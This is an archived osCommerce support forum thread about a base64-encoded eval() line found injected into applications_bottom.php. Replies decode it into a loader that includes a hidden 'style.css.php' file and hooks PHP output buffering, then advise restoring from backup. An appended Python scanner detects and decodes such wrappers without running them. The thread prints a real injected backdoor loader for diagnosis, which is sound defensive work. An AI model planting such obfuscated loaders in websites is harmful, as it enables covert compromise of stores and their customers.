osCommerce

The e-commerce.

Weird code.


Plux

I got this code in applications_bottom.php

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2ZhdHBpcGUvcHVibGljX2h0bWwvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VuZ2xpc2gvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

As it is encoded using base64 it gives me a weird feeling. Should this be there in version 2.2 RC2a?


That looks very much like you have been hacked. You will need to clear that out or, preferably, restore from a backup of your store, after deleting the fileset on the server first.

Then follow the security suggestions

Nic

Sometimes you're the dog and sometimes the lamp post


My Contributions


The hack decodes to this:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
 $GLOBALS['mfsn']='/home/fatpipe/public_html/admin/includes/languages/english/images/buttons/style.css.php';
 if(file_exists($GLOBALS['mfsn'])){
   include_once($GLOBALS['mfsn']);
   if(function_exists('gml')&&function_exists('dgobh')){
     ob_start('dgobh');
   }
 }
}

Look for this hack file:

 

/admin/includes/languages/english/images/buttons/style.css.php

 

There may be others.

 

Once security is compromised treat EVERY FILE as guilty until proven innocent by close inspection.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help
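
A defensive scan for the wrapper discussed in this thread, as an added example that is not part of any post above and is not osCommerce code: it finds `eval(base64_decode('...'))` in PHP source, decodes the payload without executing it, and lists the `.php` paths the payload references so those files can be inspected as well. The function names, the sample payload and its path are constructed for the example.

```python
import base64
import os
import re

# eval(base64_decode('...')) with optional whitespace, either quote style.
WRAPPER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE)
# Quoted absolute paths ending in .php inside a decoded payload.
PHP_PATH = re.compile(r"['\"](/[^'\"]+\.php)['\"]")

def decode_wrappers(source):
    """Decode (never execute) every eval(base64_decode(...)) payload in source."""
    payloads = []
    for match in WRAPPER.finditer(source):
        try:
            raw = base64.b64decode(match.group(2))
        except ValueError:
            continue  # bad padding or alphabet, so not this wrapper
        payloads.append(raw.decode("utf-8", errors="replace"))
    return payloads

def scan(source):
    """Return each decoded payload with the .php files it points at."""
    return [{"payload": p, "files": sorted(set(PHP_PATH.findall(p)))}
            for p in decode_wrappers(source)]

def scan_tree(root):
    """Scan every .php file under root; map file path -> findings."""
    hits = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample: same shape as the injected line, placeholder path.
SAMPLE_PAYLOAD = ("if(!isset($GLOBALS['x'])){$GLOBALS['x']="
                  "'/var/www/example/images/style.css.php';"
                  "if(file_exists($GLOBALS['x'])){include_once($GLOBALS['x']);}}")
SAMPLE_FILE = "<?php /**/eval(base64_decode('%s')); ?>" % (
    base64.b64encode(SAMPLE_PAYLOAD.encode()).decode())

if __name__ == "__main__":
    for finding in scan(SAMPLE_FILE):
        print(finding["files"], finding["payload"], sep="\n")
```

Run `scan_tree` over a copy of the webroot; every file it reports, and every path listed under `files`, needs inspection or replacement from a known-good backup.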

 


Archived

This topic is now archived and is closed to further replies.
